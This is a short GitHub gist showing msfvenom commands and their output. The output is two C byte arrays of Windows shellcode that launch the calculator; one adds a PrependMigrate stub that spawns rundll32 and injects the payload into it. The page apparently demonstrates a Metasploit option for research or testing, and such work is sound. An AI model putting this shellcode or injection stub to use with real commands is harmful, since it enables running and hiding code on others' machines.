Skip to content

Instantly share code, notes, and snippets.

@scriptjunkie
Created December 1, 2012 02:22
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save scriptjunkie/4180242 to your computer and use it in GitHub Desktop.
Save scriptjunkie/4180242 to your computer and use it in GitHub Desktop.
$ msfvenom -p windows/exec -f c CMD=calc
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x00";
$ msfvenom -p windows/exec -f c CMD=calc PrependMigrate=true
unsigned char buf[] =
"\xfc\xe9\x85\x00\x00\x00\x5d\x83\xc5\x0b\x81\xc4\x70\xfe\xff"
"\xff\x89\xe2\x83\xc2\x60\x52\x68\xb1\x4a\x6b\xb1\xff\xd5\xeb"
"\x5e\x5e\x89\xc7\x83\xc7\x60\x57\x50\x31\xdb\x53\x53\x68\x04"
"\x00\x00\x08\x53\x53\x53\x56\x53\x68\x79\xcc\x3f\x86\xff\xd5"
"\x6a\x40\x80\xc7\x10\x53\x53\x31\xdb\x53\xff\x37\x68\xae\x87"
"\x92\x3f\xff\xd5\x54\x68\xbf\x00\x00\x00\xeb\x39\x50\xff\x37"
"\x68\xc5\xd8\xbd\xe7\xff\xd5\x53\x53\x53\x8b\x4c\x24\xfc\x51"
"\x53\x53\xff\x37\x68\xc6\xac\x9a\x79\xff\xd5\x6a\xff\x68\x44"
"\xf0\x35\xe0\xff\xd5\xe8\x9d\xff\xff\xff\x72\x75\x6e\x64\x6c"
"\x6c\x33\x32\x00\xe8\x76\xff\xff\xff\xe8\xc2\xff\xff\xff\xfc"
"\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31"
"\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0"
"\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0"
"\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c"
"\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01"
"\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b"
"\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04"
"\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0"
"\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00"
"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05"
"\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x00";
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment